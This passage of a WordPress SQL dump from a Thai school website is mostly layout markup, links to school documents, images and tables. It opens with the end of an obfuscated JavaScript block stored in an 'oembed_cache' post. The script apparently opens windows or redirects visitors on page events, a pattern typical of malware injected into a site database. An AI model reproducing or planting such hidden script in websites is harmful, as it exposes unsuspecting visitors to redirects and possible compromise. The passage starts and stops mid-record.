_0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','','','publish','closed','closed','','d3ca58975c7bcfa6db2d531e42c5ddbf','','','2024-09-24 11:35:46','2024-09-24 04:35:46','',0,'http://watprato.ssk.in.th/?p=430',0,'oembed_cache','',0),
(432,2,'2024-09-24 11:40:44','2024-09-24 04:40:44','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"f67ede92\",\"mediaId\":406,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f67ede92\"><img class=\"gb-image gb-image-f67ede92\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:group {\"fontSize\":\"small\",\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group has-small-font-size\"><!-- wp:generateblocks/container {\"uniqueId\":\"36016ef6\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"e194b6ce\",\"mediaId\":401,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-e194b6ce\"><img class=\"gb-image gb-image-e194b6ce\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ3.jpg\" alt=\"\" title=\"รองผู้อำนวยการ3\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/image {\"uniqueId\":\"3791db60\",\"mediaId\":404,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-3791db60\"><img class=\"gb-image gb-image-3791db60\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/รองผู้อำนวยการ2-1.jpg\" alt=\"\" title=\"รองผู้อำนวยการ2\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/i-C4sNY7Mf8?si=HVfhH_a_V4qo3m9e\n</div></figure>\n<!-- /wp:embed --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"id\":418,\"width\":\"566px\",\"height\":\"auto\",\"sizeSlug\":\"large\",\"linkDestination\":\"none\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-large is-resized is-style-default\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/09/e24fdb867221495643d16cf69a56df03-1024x346.jpg\" alt=\"\" class=\"wp-image-418\" style=\"width:566px;height:auto\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" 